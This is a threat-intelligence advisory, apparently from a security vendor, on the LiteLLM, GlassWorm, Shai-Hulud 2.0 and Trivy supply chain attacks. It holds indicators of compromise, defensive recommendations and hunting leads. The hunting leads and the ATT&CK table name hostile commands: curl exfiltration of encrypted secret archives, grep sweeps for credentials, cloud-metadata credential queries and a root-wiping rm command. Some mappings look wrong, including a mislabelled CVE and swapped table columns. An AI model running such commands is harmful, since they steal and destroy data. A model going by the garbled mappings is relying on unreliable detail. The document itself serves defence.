Supply Chain Compromise, LiteLLM, Shai-Hulud, GlassWorm, Trivy, AI/ML Infrastructure, PyPI Malicious Package, Third-Party Risk, Secret Exfiltration, Credential Harvesting, AI Security
Source Material: LiteLLM, Wiz, Cyber Security News | Technology: Python (PyPi), Node.js (npm), MCP, Cloud Infrastructure, Github | Targeted Industries: E-commerce, Finance, Human Resources, Technology, Healthcare, Telecommunications
Executive Summary
Supply chain attacks have become increasingly common as malicious actors target trusted third-party vendors and open-source dependencies to compromise downstream organizations at scale.
A software supply chain attack occurs when malicious code is added into a trusted third-party application or dependency, subsequently infecting all “downstream” users who download or utilize it. Because the average software project has many dependencies, a single infected package can trigger a large number of compromises across the globe. They take various forms, including open-source repository compromises, and CI/CD infrastructure breaches.
These attacks exploit the complex web of modern software dependencies, allowing adversaries to breach countless secure environments through a single compromised upstream entry point.
Threat Overview and Strategic Impact
Recently, the threat landscape has seen sophisticated automated campaigns predominantly exploiting open-source ecosystems like npm and PyPI. Notable examples include the Shai-Hulud 2.0 npm worm, Trivy compromise, GlassWorm, and LiteLLM Python library which was compromised by the threat actor TeamPCP this week. Malicious versions of LiteLLM (1.82.7 and 1.82.8) deployed a persistent credential stealer via a .pth file that executes automatically on Python interpreter startup, harvesting secrets including cloud tokens, SSH keys, and Kubernetes configurations.
Threat actors are utilizing worms, directly targeting AI infrastructure, and integrating into CI/CD pipelines to achieve immediate, highly privileged access across global environments.
LiteLLM (Python/PyPI): On March 24, 2026, malicious versions (1.82.7 and 1.82.8) of LiteLLM a widely used AI routing library with over 95 million monthly downloads- were uploaded to PyPI. Attributed to TeamPCP, the attack injects obfuscated code and a malicious litellm_init.pth file that executes automatically on Python startup. The payload is designed to perform broad credential theft, sweeping the environment for SSH keys, digital wallets, Kubernetes configuration files, and authentication tokens for major cloud providers (Azure, GCP, and AWS). The malware also attempts lateral movement by deploying privileged pods in Kubernetes kube-system namespaces to install a persistent systemd backdoor.
GlassWorm (Multi-Ecosystem / MCP): GlassWorm operates as an autonomous, self-spreading malware that specifically infiltrates developer environments through compromised Visual Studio Code extensions, GitHub repositories, and the npm registry. Threat actors hijack legitimate maintainer accounts to force-push malicious commits, obfuscating their payloads using invisible Unicode characters to bypass human code review and automated static analysis. Upon execution, the malware systematically harvests developer credentials, infrastructure keys, and cryptocurrency assets. It utilizes a takedown-resistant C2 architecture by leveraging the Solana blockchain as a “dead drop,” resolving instructions and secondary payload URLs by polling specific Solana transaction memos. This effectively bypasses traditional DNS/IP-based network monitoring. The malware is geofenced to avoid execution on Russian language systems and turns persistent on compromised developer workstations, attempting to automatically backdoor other dependencies to propagate throughout the software ecosystem.
Shai-Hulud 2.0 (Node.js/npm): A self-replicating npm worm infected 796 npm packages (totaling over 20 million weekly downloads) by late 2025. It injects malicious JavaScript files to install the Bun runtime, bypassing standard Node.js monitoring, and executes an obfuscated credential-stealing payload. Exfiltration occurs uniquely by creating public GitHub repositories titled “Sha1-Hulud: The Second Coming.”. The worm propagates by stealing the victim’s npm credentials to backdoor their other published packages, and if unsuccessful, attempts to delete the user’s home directory.
Trivy (Aqua Security): TeamPCP executed a complex, multi-stage supply chain breach against Trivy, Aqua Security’s popular open-source vulnerability scanning tool. This is the same threat actor responsible for the recent LiteLLM supply chain compromise. Leveraging an incompletely revoked GitHub Personal Access Token stolen weeks prior, the attackers hijacked the aqua-bot service account to distribute backdoored Trivy binaries and force-push malicious commits to version tags in the trivy-action repository. This “tag poisoning” allowed attacker-controlled code to run automatically in downstream CI/CD pipelines without alerting developers. The malware read directly from GitHub Actions Runner memory, harvesting a massive amount of cloud credentials (AWS, GCP, Azure), Kubernetes tokens, SSH keys, Docker registry credentials, and cryptocurrency wallets.
Malicious actors are exploiting the inherent trust developers place in tools and libraries to achieve immediate, highly privileged access, transforming routine dependency updates into catastrophic breaches.
Security Hardening and Recommendations
Organizations must proactively secure their software supply chains:
- Audit and Pin Dependencies: Maintain an inventory of all open-source libraries. Ensure environments do not run compromised versions of LiteLLM (1.82.7/1.82.8) and identify unauthorized npm packages matching Shai-Hulud 2.0 indicators. Pin dependencies to known-good versions and carefully review lockfiles.
- Mandatory Credential Rotation: If a compromised package is discovered, treat the environment as fully breached and instantly rotate all SSH keys, cloud tokens, database passwords, and API keys.
- Implement Zero Trust & Behavioral Analysis: Since compromised software leverages legitimate execution paths, deploy Zero Trust architecture to require continuous validation and limit lateral movement. Use behavioral-based detection to catch anomalies, such as unexpected cloud metadata queries or irregular archival commands.
- Network Blocking: Block outbound traffic to known exfiltration and C2 domains, including scan.aquasecurtiy[.]org, checkmarx[.]zone, models.litellm[.]cloud, and tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io
- Third-Party Risk Assessments: Thoroughly vet new and existing vendors for their security practices. Implement Subresource Integrity (SRI) for JavaScript and test third-party software before deployment. Use tools to detect shadow IT that might introduce unvetted dependencies.
How Deepwatch Protects Our Customers
- Detection: We are reviewing existing detections associated with identified TTPs to ensure coverage, developing new detections as applicable, and we have raised awareness around related alerting to our SOC.
- Threat Hunting: Our teams are actively hunting for known IOCs.
- Threat Intelligence: Our teams are reviewing newly identified IOCs, TTPs, and reporting related to Supply Chain Compromise to feed into our detection platform.
Threat Hunting Leads
- Search for processes utilizing curl to upload .tar.gz files (e.g., tpcp.tar.gz) combined with OpenSSL encryption commands (enc -aes-256-cbc)
- Hunt for abnormal grep commands searching for .env, ssh, or webhook URLs (hooks.slack[.]com) within CI/CD runner processes
Technical Artifacts
| Indicator Type | Value | Description |
| Domain | models.litellm[.]cloud | The primary C2 and exfiltration domain where the LiteLLM 1.82.8 credential stealer sends harvested data. |
| Domain | checkmarx[.]zone | Secondary C2 domain utilized by the LiteLLM 1.82.7payload (as well as related KICS compromises). |
| Domain | manpages[.]wtf | A redirect target domain utilized via a Namecheap URL forward from litellm[.]cloud. |
| SHA256 Hash | 71e35aef03099cd1f2d64467342730 25a163597de93912df321ef118bf13 5238 | A malicious Python startup file dropped by compromised LiteLLM version 1.82.8 with filename of litellm_init.pth that executes automatically upon interpreter initialization. |
| SHA256 Hash | a0d229be8efcb2f9135e2ad55ba275 b76ddcfeb55fa4370e0a522a5bdee0 120b | The specific file backdoored with a 12-line obfuscated payload in LiteLLM version 1.82.7 foundat litellm/proxy/proxy_server.py |
| SHA256 Hash | 6cf223aea68b0e8031ff68251e30b6 017a0513fe152e235c26f248ba1e15 c92a | A persistent backdoor file deployed by the TeamPCP malware as a systemd user service named “System Telemetry Service” at ~/.config/sysmon/sysmon.py |
| File Name | tpcp.tar.gz | A compressed archive containing the stolen, AES-256 and RSA-4096 encrypted developer secrets and credentials for exfiltration |
GlassWorm
| Indicator Type | Value | Description |
| Package | @iflow-mcp/watercrawl-watercrawl-mcp | A malicious Model Context Protocol (MCP) server package published on npm to distribute the GlassWorm malware. |
| IP Address | 45.32.150[.]251 | The primary command-and-control (C2) server used to download the stage two operating system-specific payloads and the JavaScript RAT. |
| IP Address | 217.69.3[.]152 | The exfiltration server destination for the ZIP archive containing harvested browser data and system profiles. |
| IP Address | 45.150.34[.]158 | The exfiltration server destination specifically designated to receive stolen Ledger and Trezor hardware wallet 24-word recovery phrases. |
Shai-Hulud 2.0
| Indicator Type | Value | Description |
| File Name | setup_bun.js | A malicious JavaScript file injected into npm preinstall scripts to fetch and install the Bun runtime. |
| File Name | bun_environment.js | A massive, obfuscated 10MB+ payload executedby the Bun runtime to actively harvest credentials. |
| GitHub Repo/Branch/Workflow Name | shai-hulud-workflow.yml, discussion.yaml, formatter_*.yml | Malicious GitHub Actions workflow files created by the malware to extract secrets and establish remote code execution via GitHub discussions. |
| File Name | actionsSecrets.json, truffleSecrets.json, cloud.json, contents.json, environment.json | Local JSON files containing double Base64-encoded secrets and environment data staged for exfiltration. |
| GitHub Artifact | SHA1HULUD | The name of the malicious self-hosted GitHub Actions runner registered by the malware to maintain a persistent backdoor. |
| URL | hxxps://webhook[.]site/bb8ca5f6-4175 -45d2-b042-fc9ebb8170b7 | A known malicious webhook endpoint utilized during the attack chain. |
Trivy
| Indicator Type | Value | Description |
| Domain | aquasecurtiy[.]org, scan.aquasecurtiy[.]org | Typosquatted C2 used in the Trivy attack |
| IP Address | 45.148.10[.]212 | Resolved IP for scan.aquasecurtiy[.]org |
| Domain | tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0 [.]io | ICP canister C2 dead-drop / fallback C2 |
Threat Object Mapping
- TeamPCP (Aliases: DeadCatx3, PCPcat, ShellForce)
- Shai-Hulud
- Lapsus$ (TeamPCP reportedly partnered with Lapsus$ for extortion)
Attack Pattern (MITRE ATT&CK):
| Tactic | Technique | Technique ID | Associated Threat Activity |
| Initial Access | T1195.002 | Supply Chain Compromis e | Compromise of Software Dependencies and Development Tools |
| Initial Access | T1190 | Exploit Public-Facing Application | Exploitation of React2Shell (CVE-2025-29927) |
| Execution | T1059 | Command and Scripting Interpreter | Shell, Python, JavaScript, and container-executed payloads |
| Persistence | Scheduled Task / Cron | T1053.003 | Systemd services deployed for persistent execution (sysmon.service, pgmon.service) |
| Persistence | Escape to Host | T1611 | Privileged DaemonSets mounting host filesystems (/host) |
| Credential Access | Unsecured Credentials: Credentials in Files | T1552.001 | Harvesting .env, SSH keys, and cloud secrets |
| Credential Access | Unsecured Credentials: Cloud Instance Metadata API | T1552.005 | Querying AWS IMDS (169.254.169[.]254) for IAM credentials |
| Command and Control | Encrypted Channel | T1573 | Use of the Sliver C2 framework |
| Exfiltration | Exfiltration Over C2 Channel / Web Service | T1041 / T1567 | Uploading tpcp.tar.gz to typosquatted domains via curl |
| Impact | Data Destruction | T1485 | Wiping nodes using rm -rf / –no-preserve-root |
Vulnerabilities:
- CVE-2026-33634 (Trivy supply chain attack)
- CVE-2025-29927 (React2Shell)
However, due to the fact that these are supply chain compromises that exploit legitimate architectural trust rather than traditional software flaws, these attacks often don’t relate to specific CVEs. The following Common Weakness Enumerations (CWEs) accurately map to the weaknesses exploited in these campaigns:
- CWE-494: Download of Code Without Integrity Check
- CWE-522: Insufficiently Protected Credentials
Malware/Tools:
- LiteLLM PyPI Backdoor (Versions 1.82.7, 1.82.8)
- Shai-Hulud 2.0 npm worm
- Trufflehog (Downloaded by Shai-Hulud to actively hunt for secrets)
- GlassWorm JavaScript RAT
- Watercrawl malicious MCP package
- TeamPCP Cloud Stealer
- CanisterWorm
- Sliver C2 framework
- XMRig (Cryptominer)
- FRPS and Gost (Proxy/Tunneling)
Additional Sources
- https://thehackernews.com/2026/03/glassworm-malware-uses-solana-dead.html
- https://cyberinsider.com/new-supply-chain-attack-hits-litellm-with-95m-monthly-downloa ds/
- https://github.com/DataDog/indicators-of-compromise/tree/main/shai-hulud-2.0
- https://blog.dreamfactory.com/the-litellm-supply-chain-attack-a-complete-technical-brea kdown-of-what-happened-who-is-affected-and-what-comes-next
- https://www.microsoft.com/en-us/security/blog/2026/03/24/detecting-investigating-defen ding-against-trivy-supply-chain-compromise/
- https://www.scientificamerican.com/article/glassworm-malware-hides-in-invisible-open-s ource-code/
- https://www.cisa.gov/news-events/alerts/2025/09/23/c-supply-chain-compromise-impac ting-npm-ecosystem
- https://unit42.paloaltonetworks.com/npm-supply-chain-attack/
- https://hackread.com/teampcp-trivy-checkmarx-litellm-credential-theft/
- https://www.crowdstrike.com/en-us/blog/from-scanner-to-stealer-inside-the-trivy-action supply-chain-compromise/
Share